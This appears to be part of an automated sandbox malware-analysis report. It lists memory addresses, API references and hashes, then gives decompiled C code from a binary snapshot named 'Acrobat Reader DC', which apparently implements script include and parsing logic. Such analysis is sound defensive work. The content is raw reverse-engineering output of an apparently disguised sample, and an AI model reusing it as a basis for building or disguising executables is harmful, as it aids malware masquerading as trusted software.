                                  0x00000000
                                  0x0042ae0e
                                  0x0042ae0f
                                  0x0042ae17
                                  0x0042ae18
                                  0x0042ae1d
                                  0x00000000
                                  0x0040a60f
                                  0x0040a60f
                                  0x0040a60f
                                  0x0040a612
                                  0x0042ae25
                                  0x0042ae27
                                  0x0042ae29
                                  0x0042ae30
                                  0x0042ae30
                                  0x0040a618
                                  0x0040a618
                                  0x0040a61b
                                  0x0042ae3c
                                  0x0040a621
                                  0x0040a621
                                  0x0040a624
                                  0x0042ae4b
                                  0x0042ae4c
                                  0x0042ae56
                                  0x0042ae57
                                  0x0042ae5c
                                  0x0040a62a
                                  0x0040a62a
                                  0x0040a62d
                                  0x0042ae64
                                  0x0042ae66
                                  0x0042ae68
                                  0x0042ae6f
                                  0x0042ae6f
                                  0x0042ae68
                                  0x0040a62d
                                  0x0040a624
                                  0x0040a61b
                                  0x0040a633
                                  0x0040a633
                                  0x0040a634
                                  0x0040a63b
                                  0x0040a641
                                  0x0040a646
                                  0x0040a646
                                  0x0040a649
                                  0x0040a649
                                  0x0040a64a
                                  0x0040a64a
                                  0x00000000
                                  0x0040a5d0
                                  0x0040a5a1
                                  0x0040a5a1
                                  0x0040a5a1
                                  0x0040a5a3
                                  0x0040a5a6
                                  0x0040a5a7
                                  0x0040a5ac
                                  0x0040a5ad
                                  0x0040a5b0
                                  0x0040a5b0
                                  0x00000000
                                  0x0040a5a3
                                  0x0040a3bf
                                  0x0040a3bf
                                  0x0040a3c2
                                  0x0040a3c4
                                  0x0040a3c6
                                  0x0040a3c9
                                  0x0040a3c9
                                  0x0040a3ce
                                  0x0040a3d1
                                  0x0040a3d3
                                  0x0042ab14
                                  0x0042ab14
                                  0x0040a3d9
                                  0x0040a3dd
                                  0x0040a454
                                  0x0040a457
                                  0x0040a45c
                                  0x0040a45f
                                  0x0040a463
                                  0x0040a464
                                  0x0040a46f
                                  0x0040a470
                                  0x0040a475
                                  0x0040a475
                                  0x0040a478
                                  0x0040a479
                                  0x0040a47e
                                  0x0040a482
                                  0x00000000
                                  0x0040a3df
                                  0x0040a3df
                                  0x0040a3e2
                                  0x0040a3e4
                                  0x00000000
                                  0x00000000
                                  0x0040a3e6
                                  0x0040a3e9
                                  0x0040a3eb
                                  0x0040a3f0
                                  0x0040a3f5
                                  0x0040a3f8
                                  0x0042ab20
                                  0x0042ab21
                                  0x0042ab2c
                                  0x0042ab2d
                                  0x0042ab32
                                  0x0042ab32
                                  0x0040a3fe
                                  0x0040a3ff
                                  0x0040a404
                                  0x0040a407
                                  0x0040a407
                                  0x0040a40e
                                  0x0040a411
                                  0x0040a414
                                  0x0042ab3a
                                  0x0042ab3c
                                  0x0042ab3e
                                  0x00000000
                                  0x00000000
                                  0x0042ab44
                                  0x0042ab45
                                  0x0042ab4d
                                  0x0042ab4e
                                  0x0042ab53
                                  0x00000000
                                  0x0040a41a
                                  0x0040a41a
                                  0x0040a41a
                                  0x0040a41d
                                  0x0042ab5b
                                  0x0042ab5d
                                  0x0042ab5f
                                  0x0042ab66
                                  0x0042ab66
                                  0x0040a423
                                  0x0040a423
                                  0x0040a426
                                  0x0042ab72
                                  0x0040a42c
                                  0x0040a42c
                                  0x0040a42f
                                  0x0042ab81
                                  0x0042ab82
                                  0x0042ab8c
                                  0x0042ab8d
                                  0x0042ab92
                                  0x0040a435
                                  0x0040a435
                                  0x0040a438
                                  0x0042ab9a
                                  0x0042ab9c
                                  0x0042ab9e
                                  0x0042aba5
                                  0x0042aba5
                                  0x0042ab9e
                                  0x0040a438
                                  0x0040a42f
                                  0x0040a426
                                  0x0040a43e
                                  0x0040a43e
                                  0x0040a43f
                                  0x0040a446
                                  0x0040a44c
                                  0x0040a451
                                  0x00000000
                                  0x0040a451
                                  0x0040a414
                                  0x0040a3dd
                                  0x0040a3b9
                                  0x00000000
                                  0x0042a96b
                                  0x0042a972
                                  0x00000000
                                  0x00000000
                                  0x0042a9bf
                                  0x0042a9c6
                                  0x0042a9c8
                                  0x0042a9ce
                                  0x0042a9d0
                                  0x0042a9d5
                                  0x0042a9d8
                                  0x0042a9d9
                                  0x0042a9db
                                  0x0042a9e1
                                  0x0042a9e3
                                  0x0042a9e4
                                  0x0042a9e5
                                  0x0042a9eb
                                  0x0042a9ed
                                  0x0042a9f3
                                  0x0042a9f5
                                  0x0042a9f6
                                  0x0042a9fc
                                  0x0042a9fe
                                  0x0042a9ff
                                  0x0042aa04
                                  0x0042aa07
                                  0x0042aa07
                                  0x0042a9ed
                                  0x00000000
                                  0x00000000
                                  0x0042aa19
                                  0x00000000
                                  0x00000000
                                  0x0042aa20
                                  0x0042aa22
                                  0x0042aa27
                                  0x0042aa2a
                                  0x0042aa2c
                                  0x00000000
                                  0x00000000
                                  0x0042aa32
                                  0x0042aa3b
                                  0x00000000
                                  0x00000000
                                  0x0042aa4c
                                  0x0042aa4e
                                  0x0042aa53
                                  0x0042aa5a
                                  0x0042aa5c
                                  0x0042aa5e
                                  0x0042aa60
                                  0x0042aa62
                                  0x0042aa64
                                  0x0042aa67
                                  0x0042aa69
                                  0x0042aa97
                                  0x0042aa99
                                  0x0042aa9e
                                  0x0042aaa0
                                  0x0042aaa3
                                  0x0042aaa5
                                  0x0042aaa8
                                  0x0042aaab
                                  0x0042aa6f
                                  0x0042aa6f
                                  0x0042aa70
                                  0x0042aa75
                                  0x0042aa77
                                  0x0042aa7a
                                  0x0042aa7c
                                  0x0042aa7e
                                  0x0042aa81
                                  0x0042aa84
                                  0x0042aa8a
                                  0x0042aa8f
                                  0x00000000
                                  0x00000000
                                  0x0042aab3
                                  0x0042aab5
                                  0x0042aaba
                                  0x0042aabd
                                  0x0042aabf
                                  0x0042aa45
                                  0x0042aa45
                                  0x0040a36f
                                  0x0040a36f
                                  0x00000000
                                  0x0040a36f
                                  0x0042aac1
                                  0x0042aaca
                                  0x00000000
                                  0x00000000
                                  0x0042a8fb
                                  0x0040a368
                                  0x0040a368
                                  0x00000000
                                  0x0040a368
                                  0x0040a325
                                  0x0040a312
                                  0x0040a1f7
                                  0x0040a1fa
                                  0x0040a1fc
                                  0x0042a731
                                  0x0042a736
                                  0x0042a736
                                  0x0040a202
                                  0x0040a205
                                  0x0040a208
                                  0x0042a742
                                  0x0042a745
                                  0x0042a747
                                  0x00000000
                                  0x00000000
                                  0x0042a74e
                                  0x0042a757
                                  0x0042a758
                                  0x0042a75d
                                  0x00000000
                                  0x0040a20e
                                  0x0040a20e
                                  0x0040a20e
                                  0x0040a211
                                  0x0042a765
                                  0x0042a768
                                  0x0042a76a
                                  0x0042a771
                                  0x0042a771
                                  0x0040a217
                                  0x0040a217
                                  0x0040a21a
                                  0x0042a77b
                                  0x0042a77e
                                  0x0040a220
                                  0x0040a220
                                  0x0040a223
                                  0x0042a78e
                                  0x0042a78f
                                  0x0042a79a
                                  0x0042a79b
                                  0x0042a7a0
                                  0x0040a229
                                  0x0040a229
                                  0x0040a22c
                                  0x0042a7a8
                                  0x0042a7ab
                                  0x0042a7ad
                                  0x0042a7b4
                                  0x0042a7b4
                                  0x0042a7ad
                                  0x0040a22c
                                  0x0040a223
                                  0x0040a21a
                                  0x0040a232
                                  0x0040a232
                                  0x0040a239
                                  0x0040a240
                                  0x0040a243
                                  0x0040a245
                                  0x0040a24a
                                  0x0040a24f
                                  0x0040a252
                                  0x0042a7c0
                                  0x0042a7c1
                                  0x0042a7cc
                                  0x0042a7cd
                                  0x0042a7d2
                                  0x0042a7d2
                                  0x0040a258
                                  0x0040a259
                                  0x0040a25e
                                  0x0040a261
                                  0x0040a261
                                  0x0040a268
                                  0x0040a26b
                                  0x0040a26e
                                  0x0042a7da
                                  0x0042a7dc
                                  0x0042a7de
                                  0x00000000
                                  0x00000000
                                  0x0042a7e5
                                  0x0042a7ed
                                  0x0042a7ee
                                  0x0042a7f3
                                  0x00000000
                                  0x0040a274
                                  0x0040a274
                                  0x0040a274
                                  0x0040a277
                                  0x0042a7fb
                                  0x0042a7fd
                                  0x0042a7ff
                                  0x0042a806
                                  0x0042a806
                                  0x0040a27d
                                  0x0040a27d
                                  0x0040a280
                                  0x0042a812
                                  0x0040a286
                                  0x0040a286
                                  0x0040a289
                                  0x0042a821
                                  0x0042a822
                                  0x0042a82c
                                  0x0042a82d
                                  0x0042a832
                                  0x0040a28f
                                  0x0040a28f
                                  0x0040a292
                                  0x0042a83a
                                  0x0042a83c
                                  0x0042a83e
                                  0x0042a845
                                  0x0042a845
                                  0x0042a83e
                                  0x0040a292
                                  0x0042a131
                                  0x0042a133
                                  0x0042a137
                                  0x0042a13d
                                  0x0042a140
                                  0x0042a140
                                  0x00000000
                                  0x00000000
                                  0x0042a0f9
                                  0x0042a0fb
                                  0x00000000
                                  0x00000000
                                  0x0042a147
                                  0x0042a149
                                  0x0042a14f
                                  0x0042a151
                                  0x0042a156
                                  0x0042a159
                                  0x0042a15a
                                  0x0042a15c
                                  0x0042a162
                                  0x0042a164
                                  0x0042a166
                                  0x0042a167
                                  0x0042a168
                                  0x0042a16e
                                  0x0042a170
                                  0x0042a176
                                  0x0042a178
                                  0x0042a179
                                  0x0042a17f
                                  0x0042a181
                                  0x0042a182
                                  0x0042a187
                                  0x0042a18a
                                  0x0042a18a
                                  0x0042a170
                                  0x00000000
                                  0x00000000
                                  0x0042a197
                                  0x00000000
                                  0x00000000
                                  0x0042a19e
                                  0x0042a1a0
                                  0x0042a1a5
                                  0x0042a1a8
                                  0x0042a1aa
                                  0x00000000
                                  0x00000000
                                  0x0042a1b0
                                  0x0042a1b4
                                  0x00000000
                                  0x00000000
                                  0x0042a1be
                                  0x0042a1c0
                                  0x0042a1c5
                                  0x0042a1c7
                                  0x0042a1c9
                                  0x0042a1cb
                                  0x0042a1cd
                                  0x0042a1cf
                                  0x0042a1d1
                                  0x0042a1d4
                                  0x0042a1d6
                                  0x0042a206
                                  0x0042a208
                                  0x0042a20d
                                  0x0042a20f
                                  0x0042a212
                                  0x0042a214
                                  0x0042a217
                                  0x0042a21a
                                  0x0042a1dc
                                  0x0042a1dc
                                  0x0042a1dd
                                  0x0042a1e2
                                  0x0042a1e4
                                  0x0042a1e7
                                  0x0042a1e9
                                  0x0042a1eb
                                  0x0042a1ed
                                  0x0042a1f0
                                  0x0042a1f4
                                  0x0042a1f9
                                  0x0042a1fe
                                  0x00000000
                                  0x00000000
                                  0x0042a222
                                  0x0042a224
                                  0x0042a229
                                  0x0042a22c
                                  0x0042a22e
                                  0x0042a242
                                  0x0042a242
                                  0x0040a66a
                                  0x0040a66a
                                  0x00000000
                                  0x0040a66a
                                  0x0042a234
                                  0x0042a238
                                  0x00000000
                                  0x00000000
                                  0x00409dd0
                                  0x00409c2e
                                  0x00409c2e
                                  0x00409c35
                                  0x00409c39
                                  0x00429f4c
                                  0x00429f58
                                  0x00429f62
                                  0x00429f67
                                  0x00429f6a
                                  0x00429f6a
                                  0x00409c3f
                                  0x00409c44
                                  0x00409c49
                                  0x00409c4e
                                  0x00409c52
                                  0x00409c52
                                  0x00409c56
                                  0x00409c56
                                  0x00409c56
                                  0x00409c59
                                  0x00409c5b
                                  0x00409c5e
                                  0x00409c60
                                  0x00000000
                                  0x00000000
                                  0x00409c66
                                  0x00409c66
                                  0x00409c68
                                  0x00429f79
                                  0x00429f79
                                  0x00429f7b
                                  0x00409cb7
                                  0x00409cb9
                                  0x00409cbc
                                  0x00409cbe
                                  0x00429ffb
                                  0x0042a000
                                  0x0042a003
                                  0x0042a005
                                  0x0042a029
                                  0x0042a02f
                                  0x0042a032
                                  0x0042a037
                                  0x0042a03b
                                  0x00409c56
                                  0x00409c56
                                  0x00409c59
                                  0x00409c5b
                                  0x00409c5e
                                  0x00409c60
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409c60
                                  0x0042a00d
                                  0x0042a015
                                  0x0042a01a
                                  0x0042a01d
                                  0x0042a01f
                                  0x0042a023
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042a023
                                  0x00409cc4
                                  0x00409cc4
                                  0x00409cd2
                                  0x00409cde
                                  0x00409ce3
                                  0x00409ce9
                                  0x00409cee
                                  0x00409cf3
                                  0x00409cf6
                                  0x0042a04c
                                  0x0042a04e
                                  0x0042a050
                                  0x00000000
                                  0x00000000
                                  0x0042a05e
                                  0x00000000
                                  0x0042a05e
                                  0x00000000
                                  0x00409cf6
                                  0x00429f81
                                  0x00409c6e
                                  0x00409c70
                                  0x00429f9d
                                  0x00409ca9
                                  0x00409ca9
                                  0x00409cab
                                  0x00429fa7
                                  0x00429fa9
                                  0x00429fac
                                  0x00429fae
                                  0x00000000
                                  0x00000000
                                  0x00429fb6
                                  0x00429fbb
                                  0x00429fbe
                                  0x00429fc0
                                  0x00429fe4
                                  0x00429fea
                                  0x00429fed
                                  0x00429ff2
                                  0x00409c52
                                  0x00000000
                                  0x00409c52
                                  0x00429fc8
                                  0x00429fd0
                                  0x00429fd5
                                  0x00429fd8
                                  0x00429fda
                                  0x00429fde
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00429fde
                                  0x00409cb1
                                  0x0042a042
                                  0x00000000
                                  0x0042a042
                                  0x00000000
                                  0x00409cb1
                                  0x00409c76
                                  0x00409c78
                                  0x00429f8a
                                  0x00429f8a
                                  0x00409c7e
                                  0x00409c7e
                                  0x00409c80
                                  0x00409c82
                                  0x00409c84
                                  0x00409c87
                                  0x00409c8a
                                  0x00000000
                                  0x00000000
                                  0x00409c8c
                                  0x00409c8f
                                  0x00409c92
                                  0x00409c92
                                  0x00409c93
                                  0x00000000
                                  0x00409c95
                                  0x00429f86
                                  0x00000000
                                  0x00429f86
                                  0x00409c93
                                  0x00409c9a
                                  0x00409c9e
                                  0x00429f91
                                  0x00409ca4
                                  0x00409ca4
                                  0x00409ca4
                                  0x00409c9e
                                  0x00000000
                                  0x00429f71
                                  0x00429f71
                                  0x00429f73
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00429f73
                                  0x00409c56
                                  0x00409c52
                                  0x00429dfa
                                  0x00429dfc
                                  0x00429dfe
                                  0x00429e01
                                  0x00429e1c
                                  0x00429e1c
                                  0x00429e1d
                                  0x00429e1d
                                  0x00000000
                                  0x00429e1d
                                  0x00429e07
                                  0x00429e0a
                                  0x00000000
                                  0x00000000
                                  0x00429e10
                                  0x00429e18
                                  0x00000000
                                  0x00429e18
                                  0x004098e1
                                  0x004098e1
                                  0x004098e9
                                  0x004098f0
                                  0x004098f0
                                  0x004098f4
                                  0x00000000
                                  0x00000000
                                  0x00409905
                                  0x00409909
                                  0x0040990c
                                  0x0040990e
                                  0x00409910
                                  0x00409912
                                  0x00409916
                                  0x004298de
                                  0x004298e0
                                  0x004298e2
                                  0x004298e5
                                  0x004298f2
                                  0x004298f5
                                  0x00429c9d
                                  0x00429c9f
                                  0x0042ae80
                                  0x0042ae83
                                  0x00000000
                                  0x0042ae83
                                  0x004298fb
                                  0x00000000
                                  0x004298fb
                                  0x004298eb
                                  0x00429900
                                  0x00429900
                                  0x00429903
                                  0x00429907
                                  0x0042990a
                                  0x0042990a
                                  0x00429911
                                  0x00409922
                                  0x00409925
                                  0x0040992a
                                  0x0040992c
                                  0x0040992c
                                  0x0040992c
                                  0x0040992e
                                  0x00409932
                                  0x00409936
                                  0x00409938
                                  0x0040a689
                                  0x0040a68b
                                  0x0040a68e
                                  0x0040a690
                                  0x0040a690
                                  0x0040a697
                                  0x0040a6a9
                                  0x0040a6c0
                                  0x0040a6c4
                                  0x0040a6d0
                                  0x0040a6d1
                                  0x0040a6da
                                  0x0040a6dd
                                  0x0040a6dd
                                  0x0040993e
                                  0x00409940
                                  0x00409945
                                  0x00409948
                                  0x0040994a
                                  0x00429916
                                  0x00409950
                                  0x00409950
                                  0x00409950
                                  0x00409956
                                  0x00409959
                                  0x0040995a
                                  0x0040995e
                                  0x00409960
                                  0x00429923
                                  0x00429927
                                  0x0042992a
                                  0x0042992f
                                  0x00429cb9
                                  0x00429cba
                                  0x00429cbf
                                  0x00000000
                                  0x00429cbf
                                  0x00429941
                                  0x00429943
                                  0x00429948
                                  0x0042994a
                                  0x00429cd9
                                  0x00429cda
                                  0x00429cdc
                                  0x00000000
                                  0x00429cdc
                                  0x00429950
                                  0x00429958
                                  0x0042998a
                                  0x0042998a
                                  0x0042998e
                                  0x00429993
                                  0x00429997
                                  0x0042999b
                                  0x0042999f
                                  0x004299fb
                                  0x004299ff
                                  0x00429a0d
                                  0x00429a15
                                  0x00429a19
                                  0x00429a1e
                                  0x00000000
                                  0x00429a1e
                                  0x004299a5
                                  0x004299af
                                  0x004299b2
                                  0x004299b7
                                  0x00000000
                                  0x00000000
                                  0x004299cc
                                  0x004299d1
                                  0x004299d3
                                  0x00000000
                                  0x00000000
                                  0x004299dd
                                  0x004299e6
                                  0x004299ef
                                  0x004299f4
                                  0x00000000
                                  0x004299f4
                                  0x0042995e
                                  0x00429964
                                  0x00000000
                                  0x00000000
                                  0x0042997e
                                  0x0042997f
                                  0x00429984
                                  0x00000000
                                  0x00409966
                                  0x00409966
                                  0x0040996a
                                  0x0040996c
                                  0x00429a28
                                  0x00429a2d
                                  0x00429a2d
                                  0x00409972
                                  0x00409976
                                  0x00409979
                                  0x00429a3a
                                  0x00429a3e
                                  0x00429a40
                                  0x00429a47
                                  0x00429a51
                                  0x00429a52
                                  0x00429a57
                                  0x00429a57
                                  0x0040997f
                                  0x0040997f
                                  0x00409982
                                  0x00429a5f
                                  0x00429a63
                                  0x00429a65
                                  0x00429a6c
                                  0x00429a6c
                                  0x00409988
                                  0x00409988
                                  0x0040998b
                                  0x00429a7a
                                  0x00409991
                                  0x00409991
                                  0x00409994
                                  0x00429a8b
                                  0x00429a8c
                                  0x00429a98
                                  0x00429a99
                                  0x00429a9e
                                  0x0040999a
                                  0x0040999a
                                  0x0040999d
                                  0x00429aa6
                                  0x00429aaa
                                  0x00429aac
                                  0x00429ab3
                                  0x00429ab3
                                  0x00429aac
                                  0x0040999d
                                  0x00409994
                                  0x0040998b
                                  0x00409982
                                  0x004099a3
                                  0x004099a7
                                  0x004099ab
                                  0x004099b3
                                  0x004099bb
                                  0x004099bd
                                  0x0040a6e6
                                  0x0040a6e8
                                  0x0040a6eb
                                  0x0040a6ed
                                  0x0040a6ed
                                  0x0040a6f4
                                  0x0040a706
                                  0x0040a707
                                  0x0040a70c
                                  0x0040a710
                                  0x0040a71f
                                  0x0040a727
                                  0x0040a728
                                  0x0040a72d
                                  0x0040a730
                                  0x0040a730
                                  0x004099c3
                                  0x004099c7
                                  0x004099c9
                                  0x004099ce
                                  0x004099d1
                                  0x004099d3
                                  0x00429c8c
                                  0x004099fa
                                  0x004099fa
                                  0x00409a01
                                  0x00409a06
                                  0x00409a18
                                  0x00409a1d
                                  0x00409a1f
                                  0x0042ae89
                                  0x0042ae8d
                                  0x0042ae96
                                  0x0042ae9f
                                  0x0042aea4
                                  0x00000000
                                  0x00409a25
                                  0x00409a25
                                  0x00409a30
                                  0x00409a35
                                  0x00409a3a
                                  0x00409a3e
                                  0x00429c93
                                  0x00429c93
                                  0x00409a44
                                  0x00409a44
                                  0x00409a48
                                  0x00409a4a
                                  0x00000000
                                  0x00000000
                                  0x00409a4c
                                  0x00409a52
                                  0x00409a5a
                                  0x00409a5e
                                  0x00429ce2
                                  0x00429cec
                                  0x00429ced
                                  0x00000000
                                  0x00429ced
                                  0x00409a64
                                  0x00409a67
                                  0x00409a6b
                                  0x00000000
                                  0x00409a71
                                  0x00409a75
                                  0x00409a7b
                                  0x00409a82
                                  0x00409a85
                                  0x00409a89
                                  0x00409a8b
                                  0x00409a8b
                                  0x00409a8b
                                  0x00409a8b
                                  0x00409a93
                                  0x00409a94
                                  0x00409a98
                                  0x00409a9c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409a9c
                                  0x00409a6b
                                  0x00409a1f
                                  0x004099d9
                                  0x004099db
                                  0x004099df
                                  0x004099e2
                                  0x004099e9
                                  0x004099ec
                                  0x00429abd
                                  0x00429abe
                                  0x00429ac1
                                  0x00429b70
                                  0x00429b70
                                  0x00429b74
                                  0x004099f8
                                  0x004099f8
                                  0x00000000
                                  0x004099f8
                                  0x00429ac7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00429b0e
                                  0x00429b12
                                  0x00429b14
                                  0x00429b18
                                  0x00000000
                                  0x00000000
                                  0x00429b20
                                  0x00429b24
                                  0x00000000
                                  0x00000000
                                  0x00429ace
                                  0x00429ad0
                                  0x00429ad5
                                  0x00429ad8
                                  0x00429ada
                                  0x00429b06
                                  0x00429ae0
                                  0x00429ae0
                                  0x00429ae6
                                  0x00429aeb
                                  0x00429af1
                                  0x00429af4
                                  0x00429af7
                                  0x00429afa
                                  0x00429afc
                                  0x00429afc
                                  0x00000000
                                  0x00000000
                                  0x00429b36
                                  0x00429b3b
                                  0x00429b40
                                  0x00429b43
                                  0x00429b45
                                  0x00429b5d
                                  0x00429b5d
                                  0x00429b4b
                                  0x00429b4b
                                  0x00429b4f
                                  0x00429b54
                                  0x00429b56
                                  0x00429b56

                                  APIs
                                  • _wcslen.LIBCMT ref: 004096C1
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 0040970C
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                  • _memmove.LIBCMT ref: 00409D96
                                  • _memmove.LIBCMT ref: 0040A6C4
                                  • _memmove.LIBCMT ref: 004297E5
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                  • String ID:
                                  • API String ID: 2383988440-0
                                  • Opcode ID: a639c434517bd2e0037d18529c0e2033c2f3a75bfd55056ecc2ab01d8741cfb2
                                  • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                  • Opcode Fuzzy Hash: a639c434517bd2e0037d18529c0e2033c2f3a75bfd55056ecc2ab01d8741cfb2
                                  • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E004033C0(void* __edx, void* __fp0, char _a1, char _a2, signed int _a3, void* _a4, WCHAR* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, char _a48, intOrPtr _a52, signed char _a68, intOrPtr _a72, char _a84, WCHAR* _a92, short _a96, short _a624, char _a1152, short _a1672, char _a2200, char _a10392, char _a10912) {
                                  				char _v0;
                                  				char _v19;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t146;
                                  				signed int _t147;
                                  				void* _t151;
                                  				signed char _t180;
                                  				char _t182;
                                  				intOrPtr _t183;
                                  				void* _t191;
                                  				void* _t197;
                                  				signed int _t198;
                                  				signed int _t202;
                                  				signed int _t203;
                                  				signed int _t204;
                                  				signed int _t207;
                                  				void* _t210;
                                  				void* _t211;
                                  				void* _t212;
                                  				void* _t213;
                                  				char* _t215;
                                  				intOrPtr* _t216;
                                  				signed int _t225;
                                  				intOrPtr _t226;
                                  				signed int _t277;
                                  				signed int _t278;
                                  				signed int _t280;
                                  				signed int _t282;
                                  				intOrPtr* _t284;
                                  				signed int _t285;
                                  				signed int _t286;
                                  				void* _t288;
                                  				void* _t290;
                                  				void* _t291;
                                  
                                  				_t322 = __fp0;
                                  				_t286 = _t285 & 0xfffffff8;
                                  				E00422240(0x2cac);
                                  				_t146 =  *0x4a9538; // 0x0
                                  				_t147 = _t146 + 1;
                                  				 *0x4a9538 = _t147;
                                  				_t294 = _t147 - 0x30;
                                  				if(_t147 >= 0x30) {
                                  					E00454014(__eflags, __fp0, _a4, _a16, _a24, L"#include depth exceeded.  Make sure there are no recursive includes", _a20);
                                  					 *0x4a9538 =  *0x4a9538 - 1;
                                  					_t151 = 0;
                                  					L42:
                                  					return _t151;
                                  				}
                                  				_t270 = _a8;
                                  				_t225 = 1;
                                  				_a4 = 0;
                                  				_a1 = 1;
                                  				_a3 = 1;
                                  				_a2 = 0;
                                  				E0040DA60( &_a24, _t294);
                                  				E00401B10(_t270,  &_a8, _t294);
                                  				if(E0040DE40(0x2000,  &_a24, _t270,  &_a8) == 0) {
                                  					_v0 = 1;
                                  				} else {
                                  					_v0 = 0;
                                  				}
                                  				E00402250( &_a8);
                                  				if(_v0 != 0) {
                                  					E00454014(__eflags, _t322, _a4, _a16, _a24, L"Error opening the file", _a20);
                                  					E00443FDF( &_a4);
                                  					 *0x4a9538 =  *0x4a9538 - 1;
                                  					_t151 = 0;
                                  					goto L42;
                                  				} else {
                                  					GetCurrentDirectoryW(0x104,  &_a1672);
                                  					GetFullPathNameW(_t270, 0x104,  &_a96,  &_a92);
                                  					E00413A0E( &_a96,  &_a84,  &_a1152,  &_a10912,  &_a10392);
                                  					E00411567( &_a624,  &_a84);
                                  					E00411536( &_a624,  &_a1152);
                                  					_t288 = _t286 + 0x24;
                                  					_t237 =  &_a624;
                                  					SetCurrentDirectoryW( &_a624);
                                  					while(_t225 == 1) {
                                  						_a2200 = 0;
                                  						E00403350( &_a48);
                                  						_t180 = _a68;
                                  						if((_t180 & 0x00000003) != 0) {
                                  							_t182 = E0045F6BB(_t237, __eflags, _t322,  &_a24,  &_a48);
                                  							_t226 = 0;
                                  						} else {
                                  							_t299 = _t180 & 0x00000004;
                                  							if((_t180 & 0x00000004) != 0) {
                                  								_t182 = E00468961( &_a24, __eflags, _t322,  &_a24,  &_a48);
                                  								_t226 = 0;
                                  							} else {
                                  								_t226 = 0;
                                  								_push(0x10);
                                  								_a12 = 0;
                                  								_a16 = 0x10;
                                  								_t215 = E004115D7(_t270,  &_a48, _t299);
                                  								_push(4);
                                  								_a8 = _t215;
                                  								 *_t215 = 0;
                                  								_t216 = E004115D7(_t270,  &_a48, _t299);
                                  								_t288 = _t288 + 8;
                                  								if(_t216 == 0) {
                                  									_a20 = 0;
                                  								} else {
                                  									 *_t216 = 1;
                                  									_a20 = _t216;
                                  								}
                                  								if(E004037A0( &_a24,  &_a8, _t322) == 0) {
                                  									E00401350( &_a8);
                                  									_t182 = 0;
                                  								} else {
                                  									E00403AF0(_t226,  &_a8,  &_a48);
                                  									_t284 = _a12;
                                  									 *_t284 =  *_t284 - 1;
                                  									if( *_t284 == 0) {
                                  										_t237 = _a8;
                                  										_push(_a8);
                                  										E004111DC();
                                  										_push(_t284);
                                  										E004111DC();
                                  										_t288 = _t288 + 8;
                                  									}
                                  									_t182 = 1;
                                  								}
                                  							}
                                  						}
                                  						if(_t182 == 0) {
                                  							L41:
                                  							E0040DA20( &_a24);
                                  							_a68 = _t226;
                                  							_a72 = _t226;
                                  							SetCurrentDirectoryW( &_a1672);
                                  							E0040DA20( &_a24);
                                  							_a68 = _t226;
                                  							_a72 = _t226;
                                  							E00402250( &_a48);
                                  							E0040DA20( &_a24);
                                  							_push(_a28);
                                  							E004111DC();
                                  							_t151 = _a1;
                                  							 *0x4a9538 =  *0x4a9538 - 1;
                                  							__eflags =  *0x4a9538;
                                  							goto L42;
                                  						} else {
                                  							_t183 = _a52;
                                  							if(_t183 > 0xffe) {
                                  								_t277 = _t183 - 0xffe;
                                  								E004026F0( &_a48);
                                  								E00410E60(_a48 + 0x1ffc, _a48 + 0x1ffc + _t277 * 2, _a52 - _t277 + _a52 - _t277 - 0x1ffa);
                                  								_t288 = _t288 + 0xc;
                                  								_a52 = _a52 - _t277;
                                  							}
                                  							E00411567( &_a2200, _a48);
                                  							_a4 = _a4 + 1;
                                  							_t290 = _t288 + 8;
                                  							_t278 = 0;
                                  							_t270 = 0;
                                  							while(1) {
                                  								_t227 =  *(_t290 + 0x8a8 + _t278 * 2) & 0x0000ffff;
                                  								_t191 = E0041324E( *(_t290 + 0x8a8 + _t278 * 2) & 0x0000ffff);
                                  								_t288 = _t290 + 4;
                                  								if(_t191 == 0) {
                                  									break;
                                  								}
                                  								_t213 = E00413225(_t237, _t227);
                                  								_t290 = _t288 + 4;
                                  								if(_t213 != 0) {
                                  									_t278 = _t278 + 1;
                                  									continue;
                                  								}
                                  								break;
                                  							}
                                  							if( *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2)) == _t270) {
                                  								L21:
                                  								 *((short*)(_t288 + 0x8a8 + _t270 * 2)) = 0;
                                  								if(E004039A0( &_a2200) == 0) {
                                  									E00454014(__eflags, _t322, _a4, _a16, _a4, L"Unterminated string",  &_a2200);
